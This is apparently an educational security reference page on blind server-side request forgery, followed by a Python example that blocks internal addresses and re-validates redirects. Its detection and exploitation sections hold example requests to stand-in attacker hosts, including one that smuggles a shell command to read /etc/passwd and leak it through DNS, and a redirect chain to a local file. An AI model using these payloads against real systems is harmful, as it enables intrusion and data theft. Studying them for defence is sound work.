Blind SSRF

Blind SSRF occurs when an application is vulnerable to SSRF but the response from the forged request is not returned to the attacker. The attacker must use indirect methods to confirm the vulnerability and extract data.

How It Works

Unlike regular SSRF where responses are visible, blind SSRF requires alternative channels. Attackers use timing differences, out-of-band callbacks, or observable side effects to infer results.

Detection Techniques

// Out-of-band detection with callback
GET /fetch?url=http://attacker-controlled.com/callback

// DNS-based detection
GET /fetch?url=http://uniqueid.attacker.com/

// Timing-based (internal vs external response time)
GET /fetch?url=http://192.168.1.1/  -- fast response if the internal host exists
GET /fetch?url=http://192.168.1.2/  -- times out if the host does not exist

Exploitation via Out-of-Band

// Exfiltrate data via DNS
GET /fetch?url=http://$(cat /etc/passwd | base64).attacker.com/

// Redirect-based chaining
GET /fetch?url=http://attacker.com/redirect?to=file:///etc/passwd

// Exploiting internal services that trigger callbacks
GET /fetch?url=http://internal-webhook-service/trigger

Common Scenarios

  • Webhook configurations
  • PDF/document generators
  • Image processing services
  • URL validation endpoints

Prevention

  • Same as regular SSRF prevention
  • Disable external callbacks where possible
  • Monitor for unusual outbound connections
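The "same as regular SSRF prevention" bullet made concrete for two cases this page describes, an internal-service destination and a redirect that switches to file://. This is an added example, not code from the original page. It assumes a fetcher whose transport is injected as a hypothetical do_request(url) returning (status, location, body), and a resolver that can be swapped for a fake so the check runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}  # blocks file://, gopher://, etc.


def resolve_all(host):
    """Resolve a hostname to every address it maps to (A and AAAA)."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}


def is_safe_address(addr):
    """Reject loopback, RFC1918, link-local (cloud metadata), multicast, reserved."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_url(url, resolver=resolve_all):
    """Return the parsed URL if its scheme is allowed and every resolved
    address is routable; raise ValueError otherwise."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.hostname:
        raise ValueError(f"blocked scheme or missing host: {url}")
    addrs = resolver(parsed.hostname)
    if not addrs or not all(is_safe_address(a) for a in addrs):
        raise ValueError(f"blocked destination: {parsed.hostname} -> {sorted(addrs)}")
    return parsed


def fetch_checked(url, do_request, resolver=resolve_all, max_redirects=3):
    """Fetch url, following redirects manually so every hop is re-validated.

    do_request(url) is a hypothetical transport returning (status, location,
    body); it must not follow redirects itself, or the check is bypassed.
    """
    for _ in range(max_redirects + 1):
        validate_url(url, resolver)
        status, location, body = do_request(url)
        if status not in (301, 302, 303, 307, 308):
            return body
        url = location  # the next hop is validated at the top of the loop
    raise ValueError("too many redirects")
```

Resolving before the request and re-validating each redirect hop closes the two chaining paths above; pair it with egress monitoring, since a host that resolves to a public address at check time can still be rebound later.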

See Also